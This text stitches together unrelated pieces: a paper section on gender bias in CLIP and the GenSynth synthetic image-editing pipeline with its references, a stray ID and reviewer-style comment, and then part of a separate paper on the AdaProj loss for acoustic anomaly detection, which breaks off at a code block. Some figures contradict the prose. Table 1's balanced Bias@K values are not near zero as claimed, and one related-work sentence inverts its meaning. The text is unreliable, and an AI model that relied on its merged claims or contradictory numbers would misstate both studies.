**Spurious Correlations Classifier.** Following [Schwemmer et al., 2020], we investigate the presence of spurious correlations by training classifiers to predict binary gender labels of images and captions where the explicit gender information is removed for both training and testing. Specifically, for the image classifier (ResNet-50) we replace all person bounding boxes with black pixels, and for the caption classifier (BERT-base) we use the gender-neutralised captions. The training and testing data are the COCO train and validation sets defined in Sec. 3.2, with undefined images dropped. On unseen data, the text-only classifier on gender-neutralised captions achieves 78.0% AUC and the image-only classifier on person-masked images achieves 63.4% AUC. Given that a random-chance model achieves 50% AUC and an image classifier on unmasked images achieves 71.9% AUC, it is clear that spurious correlations in the image, as well as biases in the caption, provide a significant signal for predicting the gender of the person in the image even when there is no explicit gender information.
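A minimal sketch of the image-side setup for this experiment, assuming person boxes in (x1, y1, x2, y2) pixel coordinates and an ImageNet-pretrained ResNet-50 from torchvision as the backbone; the preprocessing and training loop are omitted.

```python
import torch
import torchvision

def mask_person_boxes(image: torch.Tensor, boxes) -> torch.Tensor:
    """Blank out person bounding boxes with black pixels so that only the
    background context remains visible to the classifier.
    image: (3, H, W) float tensor; boxes: iterable of (x1, y1, x2, y2)."""
    out = image.clone()
    for x1, y1, x2, y2 in boxes:
        out[:, int(y1):int(y2), int(x1):int(x2)] = 0.0
    return out

# A background-only binary gender classifier could then be a standard ResNet-50
model = torchvision.models.resnet50(weights="IMAGENET1K_V2")
model.fc = torch.nn.Linear(model.fc.in_features, 2)  # male vs. female logits
```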
### 3.4 THE EFFECT OF DATASET BIAS ON MODEL BIAS MEASUREMENT

There are two angles to dataset bias: (1) over-representation – there are more photos of men than women in COCO on average; and (2) spurious correlations, i.e., some environments/backgrounds are more prevalent for specific gender groups. Accordingly, the dataset used for bias evaluation significantly affects the model bias measurement. This is exemplified by a theoretically gender-agnostic model, which we instantiate as a TF-IDF (Term Frequency – Inverse Document Frequency) ranking model for caption-to-caption retrieval on gender-neutralised captions. Despite being based on a simple numerical statistic of word occurrences, devoid of any inherent gender bias, this model still exhibits non-zero bias when evaluated on COCO captions. Our findings, reported in Tab. 1, include Bias@K and MaxSkew@K measurements on COCO Val, compared against a random model and CLIP.

Table 1: Comparison of model gender bias for CLIP [Radford et al., 2021], a theoretically gender-agnostic model (TF-IDF on non-gendered words), and a random model, on the COCO validation set under unbalanced and balanced (with standard deviation computed over 5 runs) settings.

| Model | COCO Val | COCO Val (Balanced) |
|------------------------|----------|---------------------|
| | Bias@K | MaxSkew@K | Bias@K | MaxSkew@K |
| | K=5 | K=10 | K=5 | K=10 |
| Random Model | 0.37 | 0.40 | 0.15 | 0.06 |
| TF-IDF$_{gender-agnostic}$ | 0.22 | 0.24 | 0.29 | 0.22 |
| CLIP | 0.20 | 0.23 | 0.28 | 0.23 |

For Balanced COCO Val, all models register an approximate Bias@K of zero, a consequence of the metric's signed nature, which tends to average towards zero over many directions of spurious correlations on biased but balanced data. Yet, for unbalanced data, Bias@K shifts towards the over-represented attribute in the dataset, making it an unsuitable metric for model bias measurement, as it reflects dataset bias instead. MaxSkew@K, despite being an absolute measure, is not exempt from these issues. It still records large values for the theoretically gender-agnostic model and the random model, suggesting that the established framework may be inadequate for bias measurement on natural image datasets that inherently possess their own biases.

The experiments in Tab. 1 show the inadequacy of Bias@K and MaxSkew@K for measuring bias on natural image datasets that are imbalanced. Even when correcting for the imbalance issue, spurious correlations remain in the data. Therefore, we argue that a balanced, unbiased dataset is required to robustly measure bias and compare different pre-trained models and debiasing strategies. This motivated us to propose GenSynth in Sec. 4, which attempts to fix both issues.

### 4 GenSynth: A Synthetic Gender-Balanced Dataset Using Contrast Sets

Given the limitations of measuring Bias@K and MaxSkew@K on natural images and the spurious correlations in existing datasets, we propose a framework for editing natural images into synthetic contrast sets that remove spurious background correlations along the attribute of interest, and apply the pipeline to COCO to obtain the GenSynth dataset (see Fig. 2). We first synthetically edit the person in images to cover both gender labels with fixed background context (Sec. 4.1), followed by automatic filtering that ensures the quality and correctness of the edited persons (Sec. 4.2). Finally, we verify the quality of the edited images and the filtering method (Sec. 4.3). While we implement this for the gender attribute, in practice our pipeline could be used to generate synthetic contrast sets for other identity attributes, requiring only the availability of person bounding boxes for the images.

Figure 2: An overview of our pipeline for dataset debiasing across a target attribute, in this case gender, ensuring equal demographic representation. A source image containing a person is given as input to InstructPix2Pix along with instructions to synthesise each attribute label. The resulting edits are filtered for quality via K-Nearest Neighbour (KNN) thresholding to ensure realistic-looking edits for each attribute label (male and female).
### 4.1 Synthetically Editing Images

Leveraging advancements in text-conditioned image generation and editing, we use an instruction-based model, InstructPix2Pix [Brooks et al., 2022], for editing objects in an image – referred to as the source image – while keeping the background unchanged. We edit source images from COCO that (i) contain only one person, inferred from the number of person bounding boxes; and (ii) have a defined gender label, as defined in Sec. 3.2. These restrictions remove ambiguity. Next, we crop the image to the single person bounding box and feed it to InstructPix2Pix [Brooks et al., 2022] along with multiple edit instructions for each attribute label, e.g., “make this person more masculine/feminine”. Refer to Tab. 7 for the complete set of edit instruction templates. The edited person is then replaced in the source image. By only editing the appearance of the person in the image, we preserve the background content and minimize distortion – empirically, we found that editing the entire source image rather than just the source person produced lower-quality edits with significant hallucination. For further implementation details, refer to the Appendix.

### 4.2 Automatic Quality Filtering of Edited Images

The synthetic edits with InstructPix2Pix [Brooks et al., 2022] can often be of low quality or fail to edit the source person's attribute into the target attribute. In order to ensure the quality and gender accuracy of our synthetic image sets, we introduce an automatic filtering method using K-Nearest Neighbors (KNN), similar to [Gu et al., 2020], who use KNN to score GAN-generated images. First, we embed a collection of (i) source person bounding boxes, denoted as \( R = \{ r_1, r_2, ..., r_n \} \), and (ii) synthetically-edited person bounding boxes, denoted as \( S = \{ s_1, s_2, ..., s_m \} \), using CLIP. For each synthetic box \( s_i \), we identify its K-nearest neighbors in this feature space, denoted as \( N_{s_i} = \text{KNN}(s_i, R \cup S) \), using the Euclidean distance between the embeddings. If the proportion of real images within \( N_{s_i} \), denoted as \( P_R(s_i) \), and the proportion of images with the target gender of \( s_i \), denoted as \( P_G(s_i) \), exceed the thresholds \( \tau_R \) and \( \tau_G \) respectively, the edited image \( s_i \) is accepted:

\[ P_R(s_i) = \frac{1}{K} \sum_{r \in N_{s_i}} \mathbb{1}(r \in R) \quad \text{and} \quad P_G(s_i) = \frac{1}{K} \sum_{r \in N_{s_i}} \mathbb{1}(\text{gender}(r) = \text{gender}(s_i)), \]

\[ \text{accept}(s_i) = \begin{cases} 1 & \text{if } P_R(s_i) > \tau_R \text{ and } P_G(s_i) > \tau_G \\ 0 & \text{otherwise}. \end{cases} \]

This process ensures that the accepted images are of high quality and accurately reflect the target gender change. We only retain images where the entire set of edits per unique COCO ID has at least one accepted male and one accepted female edit, then randomly select one edit for each gender from the images that pass the filter. For examples of edits at each decile of \( \tau_R \), see the Appendix.
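A minimal sketch of this filter, assuming precomputed CLIP embeddings; K and the thresholds are left as free parameters (the paper's values are not fixed here), and scikit-learn's NearestNeighbors with the default Euclidean metric stands in for the KNN search.

```python
import numpy as np
from sklearn.neighbors import NearestNeighbors

def knn_filter(real_feats, real_genders, synth_feats, synth_genders,
               K=10, tau_r=0.5, tau_g=0.5):
    """Accept a synthetic edit if, among its K nearest neighbours in CLIP
    space (over real + synthetic embeddings), the fraction of real images
    exceeds tau_r and the fraction sharing its target gender exceeds tau_g."""
    feats = np.concatenate([real_feats, synth_feats])
    is_real = np.array([True] * len(real_feats) + [False] * len(synth_feats))
    genders = np.array(list(real_genders) + list(synth_genders))

    nn = NearestNeighbors(n_neighbors=K + 1).fit(feats)  # +1: self is returned
    accepted = []
    for i, s in enumerate(synth_feats):
        idx = nn.kneighbors(s[None], return_distance=False)[0]
        idx = idx[idx != len(real_feats) + i][:K]         # drop the query itself
        p_real = is_real[idx].mean()
        p_gender = (genders[idx] == synth_genders[i]).mean()
        accepted.append(p_real > tau_r and p_gender > tau_g)
    return np.array(accepted)
```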
### 4.3 Verifying the Quality of GenSynth

We evaluate the quality of the GenSynth dataset in three ways. First, we perform a human evaluation study where two annotators each assessed the perceived gender of 100 GenSynth images and 100 corresponding original COCO images. The results affirm our pipeline's successful gender-targeted editing, with high human agreement. Further details can be found in the Appendix. Second, we automatically measure the correctness of the targeted gender edit by using CLIP to zero-shot classify the gender of people in the images. Third, to evaluate the semantic similarity of the edited image to the caption, we measure the text-to-image retrieval performance of CLIP on the synthetic text-image captions. For this, we edit the captions using the reverse of the procedure in Sec. 3.2 to reflect the gender of the person in the edited image. Then, for each image \( I_i \) in GenSynth, where \( i \in \{ 1, 2, \ldots, N \} \), we have a set of \( n \) captions \( C^j_i, j \in \{ 1, 2, \ldots, n \} \). For each caption \( C^j_i \), we perform a retrieval operation from the COCO validation set combined with the query image \( I_i \), to find a set of \( K \) images that most closely match the caption, according to the Euclidean distance of CLIP features. We denote this retrieved set as \( R^j_i(K) \). The retrieval performance is evaluated using Recall at \( K \) (\( R@K \)), which is defined as

\[ R@K = \frac{1}{Nn} \sum_{i=1}^{N} \sum_{j=1}^{n} \mathbb{1}(I_i \in R^j_i(K)). \]

We compare GenSynth against (i) the original COCO 2017 dataset (train set) of natural images containing persons; and (ii) a weak gender-editing baseline, GenSwap. This baseline has the same unique COCO images as GenSynth, but only with edited faces – we replace the detected face in the COCO image with a random face of the target gender from the FairFace dataset [Kärkkäinen & Joo, 2021]. Additional implementations of GenSwap are provided in the Appendix.

Table 2: Dataset comparison between the original COCO dataset of natural person images and synthetically edited COCO from the GenSwap and GenSynth pipelines. We report the presence of Spurious Background (BG) Correlations, Zero-Shot (ZS) Gender Accuracy, and Text-to-Image Retrieval Recall@K (R@K) amongst COCO Val 5k images using CLIP. *Unfilt.* refers to the synthetic pipeline without automatic quality filtering.

| COCO-Person Dataset | # Images | Edits per Image | Spurious BG. Correlations | ZS Gender Acc. (%) ↑ | Text-to-Image Retrieval ↑ |
|---------------------|----------|----------------|---------------------------|----------------------|--------------------------|
| Original | 11,541 | - | ✓ | 93.6 | 30.9 |
| GenSwap | 3,973 | 2 | ✗ | 67.9 | 19.0 |
| GenSynth (unfilt.) | 11,541 | 16 | ✗ | 83.9 | 22.4 |
| GenSynth | 3,973 | 2 | ✗ | 95.5 | 29.2 |

As shown in Tab. 2, GenSynth leads to very similar zero-shot classification and retrieval results to the original COCO images. The filtering step significantly improves both metrics, successfully removing bad edits. The weak baseline, GenSwap, consistently scores low, showing the importance of an effective editing method.

### 5 Benchmarking CLIP

### 5.1 Evaluation Setup

We use the following three datasets for evaluation:

GenSynth consists of 7,946 images that have been generated and filtered as discussed in Sec. 4. It consists of 3,973 unique COCO images from the train set (62.6% of which were originally male), with a male and female edit for each.
COCO$_{g}$ consists of 3,973 original (unedited) images with the same unique COCO IDs as GenSynth. All images contain a single person whose gender can be identified from the caption.

COCO$_{g\text{-}Bal}$ consists of 2,970 unique images from COCO$_{g}$, randomly sampled such that there is an equal number of male and female images. We use 5 different random seeds and report average results.

We compute MaxSkew@K for CLIP [Radford et al., 2021] and CLIP-clip [Wang et al., 2021a], with $m = 100$ clipped dimensions computed on COCO train 2017. We use the ViT-B/32 variant for both models. Refer to the Appendix for an evaluation with other debiased CLIP-like models. We only report MaxSkew@K because, as shown in Sec. 3.4, Bias@K is not a suitable measure of model bias due to its signed nature – on balanced but biased data it shows close to zero bias, as biases in both directions cancel each other out.

### 5.2 Results

In Tab. 3, we compare the gender bias of the CLIP models on the three datasets defined in Sec. 5.1. We find that debiased CLIP (CLIP-clip$_{m=100}$) records substantially lower bias on both unbalanced (COCO$_{g}$) and balanced (COCO$_{g\text{-}Bal}$) data. This is because, as noted in Sec. 3.4, balanced but biased data still contains spurious correlations related to gender. However, we observe that both models show very similar bias on the balanced and debiased GenSynth data. This near-zero difference in bias is a result in itself – it means that the positive debiasing results on COCO$_{g\text{-}Bal}$ and COCO$_{g}$ are due to dataset bias. Overall, these findings suggest that intrinsic dataset bias, specifically spurious correlations, is artificially skewing the interpretations and comparisons of model bias. This reinforces the need for balanced data with no spurious correlations and shows the utility of our proposed pipeline for dataset debiasing.\footnote{Balanced with respect to gender ratio and debiased with respect to spurious correlations.}

Table 3: Comparison of gender bias between CLIP-like models on COCO-Person datasets. We report the MaxSkew@K in caption-to-image retrieval of gender-neutralised captions. We compare CLIP [Radford et al., 2021] and CLIP-clip [Wang et al., 2021a]. We additionally report zero-shot image classification accuracy on ImageNet1K [Deng et al., 2009].

| COCO-Person Dataset | Model | MaxSkew@25 ↓ | MaxSkew@100 ↓ | ImageNet1k Acc. (%) ↑ |
|---------------------|-------|--------------|---------------|----------------------|
| COCO$_{g}$ | CLIP | 0.27 | 0.20 | 63.2 |
| | CLIP-clip$_{m=100}$ | 0.23 | 0.16 | 60.1 |
| COCO$_{g\text{-}Bal}$ | CLIP | 0.26 | 0.20 | 63.2 |
| | CLIP-clip$_{m=100}$ | 0.22 | 0.15 | 60.1 |
| GenSynth | CLIP | 0.23 | 0.18 | 63.2 |
| | CLIP-clip$_{m=100}$ | 0.22 | 0.17 | 60.1 |

### 6 LIMITATIONS AND ETHICAL CONSIDERATIONS

**Synthetic Shifts.** By generating synthetic data, we are creating a new evaluation distribution that does not necessarily represent the real-world distribution of the respective categories. This distribution shift can also be forced in contexts where it does not necessarily make sense to either face-swap or make gender edits, due to factual histories or biological identity [Blodgett et al., 2021].

**Assumptions of Binary Gender.** Our data relies on the binary gender labels from the COCO and FairFace datasets and is necessarily influenced by our respective identities. COCO also presents limitations regarding race, ethnicity, and other sensitive attributes.
We acknowledge that this approach of using binary gender and making reference to perceived gender based on appearance oversimplifies the complexity of gender identity and biological sex, and risks erasing representation of non-binary people. Despite attempts to mitigate this limitation using terms such as “masculine” and “feminine”, the resulting edits were often unusable (due to existing biases in generative models), necessitating reliance on binary and narrow terms. We advocate for future work that encodes and represents non-binary gender in datasets, and improves the generalisation of generative models to non-binary terms.

**Stacking Biases.** Our pipeline may inadvertently introduce biases from the generative model via stereotypical representations of perceived gender, e.g., if “make this person more feminine” over-emphasises pink clothes, or “make this person more masculine” over-emphasises beards. The automatic filtering step also tends to favour images with simple scene arrangements. Some generated images were identified as NSFW, a consequence of training on large-scale internet datasets [Birhane et al., 2021]. Future work could integrate more capable and fair generative models into our pipeline.

### 7 CONCLUSION

The reliability of reported model biases in VLMs is affected by the interaction between dataset bias and the choice of bias metric. In this paper, we demonstrated that naturalistic images from COCO have spurious correlations between image context and gender, which in turn affects how much trust can be placed in commonly-used metrics such as Bias@K: when measuring model bias, we may in fact be measuring dataset bias. To mitigate these problems, we proposed a pipeline for editing open-domain images at scale, creating gender-balanced contrast sets where the semantic content of the image remains the same except for the person bounding box. Our method does not require manual auditing or image curation, relying instead on an effective automatic filtering method. Using this synthetically-created contrast set (GenSynth), we found that state-of-the-art CLIP-like models measure similarly on gender bias, suggesting that measurements of model gender bias can largely be attributed to spurious model associations with gender (such as scene or background information) rather than gender itself. Through these angles of investigation, we conclude that focusing only on model bias while ignoring how dataset artefacts affect bias metrics paints an unreliable picture of identity-based bias in VLMs. We hope our work contributes to an ongoing discussion of how to seek improved representation and diversity of identity groups in image-captioning datasets, both now and in the future.

REFERENCES

Sandhini Agarwal, Gretchen Krueger, Jack Clark, Alec Radford, Jong Wook Kim, and Miles Brundage. Evaluating CLIP: towards characterization of broader capabilities and downstream implications. *arXiv preprint arXiv:2108.02818*, 2021.

Erik Altman. Synthesizing credit card transactions. In *Proceedings of the Second ACM International Conference on AI in Finance*, pp. 1–9, 2021.

Yuki M Asano, Christian Rupprecht, Andrew Zisserman, and Andrea Vedaldi. PASS: An ImageNet replacement for self-supervised pretraining without humans. 2021.

Brian Belgodere, Pierre Dognin, Adam Ivankay, Igor Melnyk, Youssef Mroueh, Aleksandra Mojsilovic, Jiri Navratil, Apoorva Nitsure, Inkit Padhi, Mattia Rigotti, et al. Auditing and generating synthetic data with controllable trust trade-offs. *arXiv preprint arXiv:2304.10819*, 2023.
Hugo Berg, Siobhan Mackenzie Hall, Yash Bhalgat, Wonsuk Yang, Hannah Rose Kirk, Aleksandar Shtedritski, and Max Bain. A prompt array keeps the bias away: Debiasing vision-language models with adversarial learning. *arXiv preprint arXiv:2203.11933*, 2022.

Karan Bhanot, Miao Qi, John S Erickson, Isabelle Guyon, and Kristin P Bennett. The problem of fairness in synthetic healthcare data. *Entropy*, 23(9):1165, 2021.

Abeba Birhane, Vinay Uday Prabhu, and Emmanuel Kahembwe. Multimodal datasets: misogyny, pornography, and malignant stereotypes. *arXiv preprint arXiv:2110.01963*, 2021.

Su Lin Blodgett, Gilsinia Lopez, Alexandra Olteanu, Robert Sim, and Hanna Wallach. Stereotyping Norwegian salmon: An inventory of pitfalls in fairness benchmark datasets. pp. 1004–1015. Association for Computational Linguistics (ACL), 2021. ISBN 9781954085527. doi: 10.18653/v1/2021.acl-long.81.

Tim Brooks, Aleksander Holynski, and Alexei A Efros. InstructPix2Pix: Learning to follow image editing instructions. *arXiv preprint arXiv:2211.09800*, 2022.

Joy Buolamwini and Timnit Gebru. Gender shades: Intersectional accuracy disparities in commercial gender classification. In *Conference on Fairness, Accountability and Transparency*, pp. 77–91. PMLR, 2018.

Aylin Caliskan, Joanna J Bryson, and Arvind Narayanan. Semantics derived automatically from language corpora contain human-like biases. *Science*, 356(6334):183–186, 2017.

Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In *Proceedings of the IEEE/CVF International Conference on Computer Vision*, pp. 9650–9660, 2021.

Xinlei Chen, Hao Fang, Tsung-Yi Lin, Ramakrishna Vedantam, Saurabh Gupta, Piotr Dollár, and C Lawrence Zitnick. Microsoft COCO captions: Data collection and evaluation server. *arXiv preprint arXiv:1504.00325*, 2015.

Mehdi Cherti, Romain Beaumont, Ross Wightman, Mitchell Wortsman, Gabriel Ilharco, Cade Gordon, Christoph Schuhmann, Ludwig Schmidt, and Jenia Jitsev. Reproducible scaling laws for contrastive language-image learning. *arXiv preprint arXiv:2212.07143*, 2022.

Ching-Yao Chuang, Varun Jampani, Yuanzhen Li, Antonio Torralba, and Stefanie Jegelka. Debiasing vision-language models via biased prompts. *arXiv preprint arXiv:2302.00070*, 2023.

Terrance De Vries, Ishan Misra, Changhan Wang, and Laurens Van der Maaten. Does object recognition work for everyone? In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition Workshops*, pp. 52–59, 2019.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. ImageNet: A large-scale hierarchical image database. In *2009 IEEE Conference on Computer Vision and Pattern Recognition*, pp. 248–255. IEEE, 2009.
BBD4cFDKxQ
The justification of this step was rather cryptic, and I could not distinguish the argument for AdaProj over AdaCos from arguments for the whole design of centroid-based embeddings for outlier detection.
ADAProj: Adaptively Scaled Angular Margin Subspace Projections for Anomaly Detection with Auxiliary Classification Tasks

Anonymous authors Paper under double-blind review

Abstract

One of the state-of-the-art approaches for semi-supervised anomaly detection is to first learn an embedding space and then estimate the distribution of normal data. This can be done by using one-class losses or by using auxiliary classification tasks based on meta information or self-supervised learning. Angular margin losses are a popular training objective because they increase intra-class similarity and avoid learning trivial solutions by reducing inter-class similarity. In this work, AdaProj, a novel loss function that generalizes angular margin losses, is presented. In contrast to angular margin losses, which project data of each class as close as possible to their corresponding class centers, AdaProj learns to project data onto class-specific subspaces. By doing so, the resulting distributions of embeddings belonging to normal data are not required to be as restrictive as with other loss functions, allowing a more detailed view of the data. This enables a system to more accurately detect anomalous samples during testing. In experiments conducted on the DCASE2022 and DCASE2023 datasets, it is shown that using AdaProj to learn an embedding space significantly outperforms other commonly used loss functions, achieving a new state-of-the-art performance on the DCASE2023 dataset.

1 Introduction

Semi-supervised anomaly detection is the task of training a system to differentiate between normal and anomalous data using only normal training samples (Aggarwal [2017]). For many applications, it is much less costly to collect normal data than anomalous samples for training a system, because anomalies occur only rarely and intentionally generating them is often costly. Therefore, for these applications a semi-supervised anomaly detection setting is often a realistic assumption. An example application is acoustic machine condition monitoring for predictive maintenance, which is largely promoted through the anomalous sound detection (ASD) tasks of the annual DCASE Challenge (Koizumi et al. [2020], Kawaguchi et al. [2021], Dohi et al. [2022a, 2023]), and which will serve as the running example in this work. Here, normal data corresponds to sounds of fully functioning machines whereas anomalous sounds indicate mechanical failure. The goal is to develop a system that detects anomalous recordings using only normal recordings as training data. One of the main difficulties to overcome is that it is practically impossible to record isolated sounds of a target machine. Instead, recordings also contain many other sounds emitted by non-target machines or humans. Compared to this complex acoustic scene, anomalous signal components of the target machines are very subtle and hard to detect without utilizing additional knowledge. Another main difficulty is that a system should also be able to reliably detect anomalous sounds when the acoustic conditions or machine settings change, without needing to collect large amounts of data in these changed conditions or to re-train the system (domain generalization (Wang et al. [2021])). One possibility to simultaneously overcome both difficulties is to learn a mapping of audio signals into a fixed-dimensional vector space in which representations belonging to normal and anomalous data, called embeddings, can be easily separated.
Then, by estimating the distribution of the normal training samples in the embedding space, one can compute an anomaly score for an unseen test sample by computing the likelihood of this sample being normal, or simply by measuring the distance to normal samples. To train such an embedding model, the state-of-the-art is to utilize an auxiliary classification task based on provided meta information or self-supervised learning (SSL). This enables the embedding model to closely monitor target signals and ignore other signals and noise (Wilkinghoff & Kurth, 2023). For machine condition monitoring, possible auxiliary tasks are classifying between machine types (Giri et al., 2020; Lopez et al., 2020; Inoue et al., 2020) or, additionally, between different machine states and noise settings (Venkatesh et al., 2022; Nishida et al., 2022; Deng et al., 2022), recognizing augmented and non-augmented versions of normal data (Giri et al., 2020; Chen et al., 2023), or predicting the activity of machines (Nishida et al., 2022). Using an auxiliary task to learn embeddings is also called outlier exposure (OE) (Hendrycks et al., 2019) because normal samples belonging to classes other than a target class can be considered proxy outliers (Primus et al., 2020).

The contributions of this work are the following. First and foremost, AdaProj, a novel angular margin loss function that learns class-specific subspaces for training an embedding model, is presented. Second, it is proven that AdaProj has arbitrarily large optimal solution spaces, allowing the compactness requirements of the class-specific distributions in the embedding space to be relaxed. Last but not least, AdaProj is compared to other commonly used loss functions. In experiments conducted on the DCASE2022 and DCASE2023 ASD datasets, it is shown that AdaProj outperforms all other loss functions. As a result, a new state-of-the-art performance is achieved on the DCASE2023 dataset.

#### 1.1 Related Work

When training a neural network to solve a classification task, usually the softmax function in combination with the categorical cross-entropy (CCE) is used. However, directly training a network this way only reduces inter-class similarity without explicitly reducing intra-class similarity (Wang et al., 2018). When training an embedding model for anomaly detection, high intra-class similarity is a desired property: it clusters normal data and thereby makes anomalous samples detectable. To address this issue, losses should also explicitly increase intra-class similarity, and there are several loss functions that achieve this. Ruff et al. (2018) proposed a compactness loss that projects the data into a hypersphere of minimal volume for one-class classification. However, for machine condition monitoring in noisy conditions, it is known that one-class losses perform worse than losses that also discriminatively solve an auxiliary classification task (Wilkinghoff & Kurth, 2023). Perera & Patel (2019) did this by simultaneously using a so-called descriptiveness loss, a CCE computed on an arbitrary dataset other than the target dataset, to learn a better-structured embedding space in case no meta information is available for the target dataset. For machine condition monitoring, meta information is often available since, when collecting data, it can at least be ensured which machine is being recorded. Inoue et al. (2020) used the center loss (Wen et al., 2016), which minimizes the distance to learned class centers for each class.
Another choice is angular margin losses, which learn an embedding space on the unit sphere while ensuring a margin between classes, leading to better generalization capabilities than losses that utilize the whole Euclidean space. Specific examples are the additive margin softmax loss (Wang et al., 2018), as used by Lopez et al. (2020; 2021), and ArcFace (Deng et al., 2019), as used by Giri et al. (2020). Kuroyanagi et al. (2021), Deng et al. (2022), and Wilkinghoff (2021; 2023a) use the AdaCos loss (Zhang et al., 2019), which essentially is ArcFace with an adaptive scale parameter, or the sub-cluster AdaCos loss (Wilkinghoff, 2021), which utilizes multiple sub-clusters instead of a single one. As stated above, the goal of this work is to further extend these loss functions to learning class-specific linear subspaces, which relaxes the compactness requirements and allows the network more flexibility when learning to map audio data into an embedding space.

There are also other works utilizing losses based on orthogonal projections to learn subspaces of embedding spaces for other applications. Yu et al. (2021) used orthogonal projections as a constraint for training an autoencoder-based anomaly detection system. Another example is semi-supervised image classification using a combination of class-specific subspace projections with a reconstruction loss, where a discriminative loss additionally ensures that the subspaces are different (Li et al., 2022). Our work focuses on learning an embedding space through an auxiliary classification task that is well-suited for semi-supervised anomaly detection.

---
1 The source code will be made available after the review process to not reveal the identity of the authors.

### 2 METHODOLOGY

#### 2.1 NOTATION

Let \( \phi : X \to \mathbb{R}^D \) denote a neural network, where \( X \) denotes some input space, which consists of audio signals in this work, and \( D \in \mathbb{N} \) denotes the dimension of the embedding space. Define the linear projection of \( x \in \mathbb{R}^D \) onto the subspace \( \text{span}(C_k) \subset \mathbb{R}^D \) as \( P_{\text{span}(C_k)}(x) := \sum_{c_k \in C_k} \langle x, c_k \rangle c_k \). Furthermore, let \( S^{D-1} = \{ y \in \mathbb{R}^D : \|y\|_2 = 1 \} \subset \mathbb{R}^D \) denote the unit sphere in \( \mathbb{R}^D \) and define \( P_{S^{D-1}}(x) := \frac{x}{\|x\|_2} \in S^{D-1} \) to be the projection onto the unit sphere.

#### 2.2 ADAProj LOSS FUNCTION

Similar to the sub-cluster AdaCos loss (Wilkinghoff, 2021), the idea of the AdaProj loss is to enlarge the space of optimal solutions to allow the network to learn less restrictive distributions of the normal samples. This may help to differentiate between normal and anomalous data after training. The reason is that, for some auxiliary classes, a strong compactness may be detrimental when aiming to learn an embedding space that separates normal and anomalous data, since both may be mapped onto the same compact distribution, making it impossible to distinguish them. This relaxation is achieved by measuring the distance to class-specific subspaces while training the embedding model, instead of measuring the distance to a single center or to multiple centers as done for other angular margin losses. Formally, the definition of the AdaProj loss is as follows.

**Definition 1** (AdaProj loss). Let \( C_k \subset \mathbb{R}^D \) with \( |C_k| = J \in \mathbb{N} \) denote class centers for class \( k \in \{1, \ldots, N_{\text{classes}}\} \).
Then for the AdaProj loss the logit for class \( k \in \{1, \ldots, N_{\text{classes}}\} \) is defined as
$$ L(x, C_k) := \hat{s} \cdot \|P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C_k)}(x))\|_2^2, $$
where \( \hat{s} \in \mathbb{R}_+ \) is the dynamically adaptive scale parameter of the AdaCos loss (Zhang et al., 2019). Inserting these logits into a softmax function and computing the CCE yields the AdaProj loss function.

**Remark.** Note that, by Lemma 5 of Wilkinghoff & Kurth (2023), it holds that
$$ \|P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C_k)}(x))\|_2^2 = 2\big(1 - \langle P_{S^{D-1}}(x), P_{S^{D-1}}(P_{\text{span}(C_k)}(x)) \rangle\big), $$
which is equal to the cosine distance in this case. This explains why the AdaProj loss can be called an angular margin loss.

As for other angular margin losses, projecting the embedding space onto the unit sphere has several advantages (Wilkinghoff & Kurth, 2023). Most importantly, if \( D \) is sufficiently large, randomly initialized centers are, with very high probability, approximately orthonormal to each other (Gorban et al., 2016), i.e., distributed equidistantly, and sufficiently far away from \( 0 \in \mathbb{R}^D \). Therefore, one does not need to carefully design a method to initialize the centers. Another advantage is that a normalization may prevent numerical issues, similar to applying batch normalization (Ioffe & Szegedy, 2015).

The following Lemma shows that using the AdaProj loss, as defined above, indeed allows the network to utilize a larger solution space.

**Lemma 2.** Let \( x \in \mathbb{R}^D \) and let \( C \subset \mathbb{R}^D \) contain pairwise orthonormal elements. Then,
$$ x \in \text{span}(C) \cap S^{D-1} \Rightarrow \|P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C)}(x))\|_2^2 = 0. $$

**Proof.** Let \( x \in \text{span}(C) \cap S^{D-1} \subset \mathbb{R}^D \) with \( |C| = J \). Then \( \|x\|_2 = 1 \) and there are \( \lambda_j \in \mathbb{R} \) with \( x = \sum_{j=1}^{J} \lambda_j c_j \). Since the elements of \( C \) are pairwise orthonormal, \( \langle x, c_j \rangle = \sum_{i=1}^{J} \lambda_i \langle c_i, c_j \rangle = \lambda_j \), and thus
$$ P_{\text{span}(C)}(x) = \sum_{j=1}^{J} \langle x, c_j \rangle c_j = \sum_{j=1}^{J} \lambda_j c_j = x. $$
Hence, \( \|P_{\text{span}(C)}(x)\|_2 = \|x\|_2 = 1 \) as well as \( \langle x, P_{\text{span}(C)}(x) \rangle = \langle x, x \rangle = \|x\|_2^2 = 1 \), and we obtain
$$ \|P_{S^{D-1}}(x) - P_{S^{D-1}}(P_{\text{span}(C)}(x))\|_2^2 = \|P_{S^{D-1}}(x)\|_2^2 - 2\langle P_{S^{D-1}}(x), P_{S^{D-1}}(P_{\text{span}(C)}(x)) \rangle + \|P_{S^{D-1}}(P_{\text{span}(C)}(x))\|_2^2 = 1 - 2\,\frac{\langle x, P_{\text{span}(C)}(x) \rangle}{\|x\|_2 \|P_{\text{span}(C)}(x)\|_2} + 1 = 1 - 2 + 1 = 0. $$

**Remark.** If \( C \) contains randomly initialized elements of the unit sphere and \( D \) is sufficiently large, then the elements of \( C \) are approximately pairwise orthonormal with very high probability (Gorban et al., 2016). Hence, the Lemma is likely to hold for the AdaProj loss. When inserting the projection onto the unit sphere as an operation into the neural network, this Lemma shows that the solution space for the AdaProj loss function is increased to the whole subspace \( \text{span}(C) \), which has a dimension of \( |C| \) with very high probability. Because of this, it should be ensured that \( |C| < D \); otherwise the whole embedding space may be an optimal solution and the network cannot learn a meaningful embedding space. In comparison, for the AdaCos loss only the class centers themselves are optimal solutions, and for the sub-cluster AdaCos loss each sub-cluster is an optimal solution (Wilkinghoff & Kurth, 2023).
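To make the definition concrete, the following is a minimal PyTorch sketch of the AdaProj logits and loss. This is our own illustration, not the authors' released code: the class name and the fixed scale value standing in for the adaptive \( \hat{s} \) are assumptions, and the negative sign on the logits is our choice so that minimizing the CCE pulls each embedding toward its target-class subspace, which, by the Remark above, is equivalent up to constants to maximizing the scaled cosine similarity as in AdaCos.

```python
import torch
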